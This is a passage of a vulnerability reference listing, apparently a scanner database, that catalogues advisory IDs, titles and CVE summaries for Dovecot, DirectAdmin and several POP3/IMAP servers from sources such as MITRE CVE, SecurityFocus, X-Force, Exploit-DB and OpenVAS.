12675| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
12676| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
12677| [131477] JBMC DirectAdmin 1.55 /CMD_ACCOUNT_ADMIN cross site request forgery
12678| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
12679| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
12680| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
12681| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
12682| [112266] JBMC DirectAdmin up to 1.51 email_ftp_password_change Setting memory corruption
12683| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
12684| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
12685| [95172] Directadmin Controlpanel 1.50.1 /CMD_SELECT_USERS cross site scripting
12686| [95100] DirectAdmin up to 1.50.1 Crash denial of service
12687| [69835] Dovecot 2.2.0/2.2.1 denial of service
12688| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
12689| [65684] Dovecot up to 2.2.6 unknown vulnerability
12690| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
12691| [63692] Dovecot up to 2.0.15 spoofing
12692| [7062] Dovecot 2.1.10 mail-search.c denial of service
12693| [62578] DirectAdmin 1.403 cross site scripting
12694| [61198] Jbmc-software DirectAdmin 1.403 cross site scripting
12695| [57517] Dovecot up to 2.0.12 Login directory traversal
12696| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
12697| [57515] Dovecot up to 2.0.12 Crash denial of service
12698| [54944] Dovecot up to 1.2.14 denial of service
12699| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
12700| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
12701| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
12702| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
12703| [53277] Dovecot up to 1.2.10 denial of service
12704| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
12705| [48756] Jbmc-software DirectAdmin up to 1.292 cross site scripting
12706| [48060] Jbmc-software DirectAdmin up to 1.17 privilege escalation
12707| [45256] Dovecot up to 1.1.5 directory traversal
12708| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
12709| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
12710| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
12711| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
12712| [40356] Dovecot 1.0.9 Cache unknown vulnerability
12713| [38747] DirectAdmin 1.30.2 cross site scripting
12714| [38222] Dovecot 1.0.2 directory traversal
12715| [37578] DirectAdmin 1.30.1 cross site scripting
12716| [36376] Dovecot up to 1.0.x directory traversal
12717| [36066] JBMC Software DirectAdmin 1.293 cross site scripting
12718| [35680] Jbmc Software DirectAdmin 1.293 cross site scripting
12719| [33341] JBMC Software DirectAdmin 1.28.1 cross site scripting
12720| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
12721|
12722| MITRE CVE - https://cve.mitre.org:
12723| [CVE-2012-5305] Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
12724| [CVE-2012-3842] Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) select0 or (2) select8 parameters.
12725| [CVE-2011-5033] Stack-based buffer overflow in CFS.c in ConfigServer Security & Firewall (CSF) before 5.43, when running on a DirectAdmin server, allows local users to cause a denial of service (crash) via a long string in an admin.list file.
12726| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
12727| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
12728| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
12729| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
12730| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
12731| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
12732| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
12733| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
12734| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
12735| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
12736| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
12737| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
12738| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
12739| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
12740| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
12741| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
12742| [CVE-2009-2216] Cross-site scripting (XSS) vulnerability in CMD_REDIRECT in DirectAdmin 1.33.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the URI in a view=advanced request.
12743| [CVE-2009-1526] JBMC Software DirectAdmin before 1.334 allows local users to create or overwrite any file via a symlink attack on an arbitrary file in a certain temporary directory, related to a request for this temporary file in the PATH_INFO to the CMD_DB script during a backup action.
12744| [CVE-2009-1525] CMD_DB in JBMC Software DirectAdmin before 1.334 allows remote authenticated users to gain privileges via shell metacharacters in the name parameter during a restore action.
12745| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
12746| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
12747| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
12748| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
12749| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
12750| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
12751| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
12752| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
12753| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
12754| [CVE-2007-4830] Cross-site scripting (XSS) vulnerability in CMD_BANDWIDTH_BREAKDOWN in DirectAdmin 1.30.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter.
12755| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
12756| [CVE-2007-3501] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin 1.30.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vector than CVE-2007-1508.
12757| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
12758| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
12759| [CVE-2007-1926] Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log
12760| [CVE-2007-1508] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin allows remote attackers to inject arbitrary web script or HTML via the RESULT parameter, a different vector than CVE-2006-5983.
12761| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
12762| [CVE-2006-5983] Multiple cross-site scripting (XSS) vulnerabilities in JBMC Software DirectAdmin 1.28.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) user parameter to (a) CMD_SHOW_RESELLER or (b) CMD_SHOW_USER in the Admin level
12763| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
12764| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
12765| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
12766| [CVE-2006-2153] Cross-site scripting (XSS) vulnerability in HTM_PASSWD in DirectAdmin Hosting Management allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
12767| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
12768| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
12769| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
12770| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
12771| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
12772|
12773| SecurityFocus - https://www.securityfocus.com/bid/:
12774| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
12775| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
12776| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
12777| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
12778| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
12779| [83952] DirectAdmin CVE-2006-2153 Cross-Site Scripting Vulnerability
12780| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
12781| [67306] Dovecot Denial of Service Vulnerability
12782| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
12783| [63911] Installatron Plugin for DirectAdmin Insecure Temporary File Creation Vulnerability
12784| [63373] Installatron Plugin for DirectAdmin cURL Output Remote Privilege Escalation Vulnerability
12785| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
12786| [62929] DirectAdmin Backup Multiple Security Vulnerabilities
12787| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
12788| [61017] DirectAdmin Symlink Attack Multiple Remote Privilege Escalation Vulnerabilities
12789| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
12790| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
12791| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
12792| [53281] DirectAdmin Multiple Cross Site Scripting Vulnerabilities
12793| [52848] RETIRED: DirectAdmin 'CMD_DOMAIN' Cross-Site Scripting Vulnerability
12794| [52845] JBMC Software DirectAdmin 'domain' Parameter Cross Site Scripting Vulnerability
12795| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
12796| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
12797| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
12798| [47693] DirectAdmin 'mysql_backup' Folder Permissions Information Disclosure Vulnerability
12799| [47690] DirectAdmin Hard Link Local Privilege Escalation Vulnerability
12800| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
12801| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
12802| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
12803| [39838] tpop3d Remote Denial of Service Vulnerability
12804| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
12805| [38721] DirectAdmin 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability
12806| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
12807| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
12808| [35450] DirectAdmin 'CMD_REDIRECT' Cross-Site Scripting Vulnerability
12809| [34678] DirectAdmin '/CMD_DB' Restore Action Local Privilege Escalation Vulnerability
12810| [34676] DirectAdmin '/CMD_DB' Backup Action Insecure Temporary File Creation Vulnerability
12811| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
12812| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
12813| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
12814| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
12815| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
12816| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
12817| [25607] DirectAdmin CMD_BANDWIDTH_BREAKDOWN Cross-Site Scripting Vulnerability
12818| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
12819| [24688] DirectAdmin Domain Parameter Cross-Site Scripting Vulnerability
12820| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
12821| [23254] DirectAdmin Logfile HTML Injection Vulnerability
12822| [22996] DirectAdmin CMD_USER_STATS Cross-Site Scripting Vulnerability
12823| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
12824| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
12825| [21049] DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
12826| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
12827| [17961] Dovecot Remote Information Disclosure Vulnerability
12828| [16672] Dovecot Double Free Denial of Service Vulnerability
12829| [8495] akpop3d User Name SQL Injection Vulnerability
12830| [8473] Vpop3d Remote Denial Of Service Vulnerability
12831| [3990] ZPop3D Bad Login Logging Failure Vulnerability
12832| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
12833|
12834| IBM X-Force - https://exchange.xforce.ibmcloud.com:
12835| [86382] Dovecot POP3 Service denial of service
12836| [85490] DirectAdmin Backup System email account functionality symlink
12837| [85488] DirectAdmin Backup System symlink
12838| [84396] Dovecot IMAP APPEND denial of service
12839| [80453] Dovecot mail-search.c denial of service
12840| [74569] DirectAdmin CMD_DOMAIN cross-site scripting
12841| [72685] DirectAdmin domain parameter cross-site request forgery
12842| [71354] Dovecot SSL Common Name (CN) weak security
12843| [67675] Dovecot script-login security bypass
12844| [67674] Dovecot script-login directory traversal
12845| [67589] Dovecot header name denial of service
12846| [67254] DirectAdmin MySQL information disclosure
12847| [67253] DirectAdmin hard link privilege escalation
12848| [63267] Apple Mac OS X Dovecot information disclosure
12849| [62340] Dovecot mailbox security bypass
12850| [62339] Dovecot IMAP or POP3 denial of service
12851| [62256] Dovecot mailbox security bypass
12852| [62255] Dovecot ACL entry security bypass
12853| [60639] Dovecot ACL plugin weak security
12854| [57267] Apple Mac OS X Dovecot Kerberos security bypass
12855| [56875] DirectAdmin name cross-site scripting
12856| [56763] Dovecot header denial of service
12857| [55181] DirectAdmin account cross-site request forgery
12858| [54363] Dovecot base_dir privilege escalation
12859| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
12860| [51292] DirectAdmin CMD_REDIRECT cross-site scripting
12861| [50167] DirectAdmin CMD_DB command execution
12862| [49416] DirectAdmin CMD_DB backup action symlink
12863| [46323] Dovecot dovecot.conf information disclosure
12864| [46227] Dovecot message parsing denial of service
12865| [45669] Dovecot ACL mailbox security bypass
12866| [45667] Dovecot ACL plugin rights security bypass
12867| [41085] Dovecot TAB characters authentication bypass
12868| [41009] Dovecot mail_extra_groups option unauthorized access
12869| [39342] Dovecot LDAP auth cache configuration security bypass
12870| [36510] DirectAdmin user parameter cross-site scripting
12871| [35767] Dovecot ACL plugin security bypass
12872| [35177] DirectAdmin domain parameter cross-site scripting
12873| [34082] Dovecot mbox-storage.c directory traversal
12874| [33390] DirectAdmin log file cross-site scripting
12875| [33023] DirectAdmin CMD_USER_STATS form cross-site scripting
12876| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
12877| [30256] DirectAdmin user, TYPE, and name parameters cross-site scripting
12878| [26578] Cyrus IMAP pop3d buffer overflow
12879| [26536] Dovecot IMAP LIST information disclosure
12880| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
12881| [24709] Dovecot APPEND command denial of service
12882| [13018] akpop3d authentication code SQL injection
12883| [7345] Slackware Linux imapd and ipop3d core dump
12884| [6269] imap, ipop2d and ipop3d buffer overflows
12885| [5923] Linuxconf vpop3d symbolic link
12886| [4918] IPOP3D, Buffer overflow attack
12887| [1560] IPOP3D, user login successful
12888| [1559] IPOP3D user login to remote host successful
12889| [1525] IPOP3D, user logout
12890| [1524] IPOP3D, user auto-logout
12891| [1523] IPOP3D, user login failure
12892| [1522] IPOP3D, brute force attack
12893| [1521] IPOP3D, user kiss of death logout
12894| [418] pop3d mktemp creates insecure temporary files
12895|
12896| Exploit-DB - https://www.exploit-db.com:
12897| [29747] DirectAdmin 1.292 CMD_USER_STATS Cross-Site Scripting Vulnerability
12898| [29006] DirectAdmin 1.28/1.29 CMD_FTP_SHOW DOMAIN Parameter XSS
12899| [29005] DirectAdmin 1.28/1.29 CMD_EMAIL_LIST name Parameter XSS
12900| [29004] DirectAdmin 1.28/1.29 CMD_EMAIL_VACATION_MODIFY user Parameter XSS
12901| [29003] DirectAdmin 1.28/1.29 CMD_TICKET type Parameter XSS
12902| [29002] DirectAdmin 1.28/1.29 CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
12903| [29001] DirectAdmin 1.28/1.29 CMD_TICKET_CREATE TYPE Parameter XSS
12904| [29000] DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS
12905| [28999] DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS
12906| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
12907| [23053] Vpop3d Remote Denial of Service Vulnerability
12908| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
12909| [11893] tPop3d 1.5.3 DoS
12910| [11813] DirectAdmin 1.34.4 - Multi CSRF vulnerability
12911| [11029] DirectAdmin <= 1.33.6 Symlink Permission Bypass
12912| [10779] DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability
12913| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
12914| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
12915| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
12916| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
12917|
12918| OpenVAS (Nessus) - http://www.openvas.org:
12919| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
12920| [901025] Dovecot Version Detection
12921| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
12922| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
12923| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
12924| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
12925| [870607] RedHat Update for dovecot RHSA-2011:0600-01
12926| [870471] RedHat Update for dovecot RHSA-2011:1187-01
12927| [870153] RedHat Update for dovecot RHSA-2008:0297-02
12928| [863272] Fedora Update for dovecot FEDORA-2011-7612
12929| [863115] Fedora Update for dovecot FEDORA-2011-7258
12930| [861525] Fedora Update for dovecot FEDORA-2007-664
12931| [861394] Fedora Update for dovecot FEDORA-2007-493
12932| [861333] Fedora Update for dovecot FEDORA-2007-1485
12933| [860845] Fedora Update for dovecot FEDORA-2008-9202
12934| [860663] Fedora Update for dovecot FEDORA-2008-2475
12935| [860169] Fedora Update for dovecot FEDORA-2008-2464
12936| [860089] Fedora Update for dovecot FEDORA-2008-9232
12937| [840950] Ubuntu Update for dovecot USN-1295-1
12938| [840668] Ubuntu Update for dovecot USN-1143-1
12939| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
12940| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
12941| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
12942| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
12943| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
12944| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
12945| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
12946| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
12947| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
12948| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
12949| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
12950| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
12951| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
12952| [70259] FreeBSD Ports: dovecot
12953| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
12954| [66522] FreeBSD Ports: dovecot
12955| [65010] Ubuntu USN-838-1 (dovecot)
12956| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
12957| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
12958| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
12959| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
12960| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
12961| [62854] FreeBSD Ports: dovecot-managesieve
12962| [61916] FreeBSD Ports: dovecot
12963| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
12964| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
12965| [60528] FreeBSD Ports: dovecot
12966| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
12967| [60089] FreeBSD Ports: dovecot
12968| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
12969| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
12970|
12971| SecurityTracker - https://www.securitytracker.com:
12972| [1028744] DirectAdmin Backup System Flaws Let Local Users Gain Elevated Privileges
12973| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
12974| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
12975| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
12976|
12977| OSVDB - http://www.osvdb.org:
12978| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
12979| [94899] DirectAdmin Backup System Unspecified Email Account Function Symlink Local Privilege Escalation
12980| [94898] DirectAdmin Backup System Unspecified Symlink Arbitrary File Manipulation Local Privilege Escalation
12981| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
12982| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
12983| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
12984| [80919] DirectAdmin CMD_DOMAIN Multiple Parameter XSS
12985| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
12986| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
12987| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
12988| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
12989| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
12990| [72119] DirectAdmin Backup Creation Hard Link Check Weakness Local Privilege Escalation
12991| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
12992| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
12993| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
12994| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
12995| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
12996| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
12997| [66113] Dovecot Mail Root Directory Creation Permission Weakness
12998| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
12999| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
13000| [66110] Dovecot Multiple Unspecified Buffer Overflows
13001| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
13002| [64783] Dovecot E-mail Message Header Unspecified DoS
13003| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
13004| [62914] DirectAdmin CMD_DB_VIEW name Parameter XSS
13005| [62796] Dovecot mbox Format Email Header Handling DoS
13006| [61395] DirectAdmin Admin Account Creation CSRF
13007| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
13008| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
